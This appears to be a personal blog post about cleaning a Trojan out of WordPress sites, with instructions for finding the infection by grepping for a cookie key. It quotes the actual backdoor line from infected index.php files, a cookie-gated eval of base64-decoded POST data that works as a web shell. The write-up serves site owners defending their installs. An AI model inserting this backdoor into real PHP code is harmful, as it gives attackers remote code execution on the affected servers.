-
Pages
Twitter
- Looks like I've got 5 invites to Gravity. Anyone want to check it out? 4 hours ago
- P.S. The most interesting part of that issue of @SPINmagazine isn't the Cobain material. It's the ads, product reviews and festival guide. 5 hours ago
- After seeing @waxpancake link up the @SPINmagazine archive earlier, I had to dig up the Kurt Cobain memorial issue: http://boogah.org/29 5 hours ago
- @rapportive: Glad to hear it! I'll just deal with it for now, but at least I won't have to groan about it for much longer. 13 hours ago
-
Foursquare
Archives
- February 2010
- January 2010
- November 2009
- August 2009
- June 2009
- February 2009
- January 2009
- December 2008
- November 2008
- October 2008
- September 2008
- August 2008
- July 2008
- June 2008
- May 2008
- April 2008
- March 2008
- January 2008
- December 2007
- November 2007
- October 2007
- September 2007
- August 2007
- July 2007
- June 2007
- May 2007
- April 2007
- March 2007
- February 2007
- January 2007
- December 2006
- November 2006
- October 2006
- September 2006
- August 2006
- July 2006
- June 2006
- May 2006
- April 2006
- March 2006
- February 2006
- January 2006
- December 2005
- November 2005
- October 2005
- September 2005
Goodbye Horses
So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed. When visiting an infected site, most folks are being prompted to download:
Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.
So how do you find out if your install has been hit? Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php:
<?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>If you see that floating around, get rid of it! Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.
Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:
grep -R 0bdcf3981272c15a /home/user/example.com/*Of course you’ll want to replace “user” with your username and “example.com” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed. Give that command a few minutes to run and you should get a path of where that code snippet can be found. All you have to do at that point is purge it and clear any cache you might have on your WP install.
Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.
All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.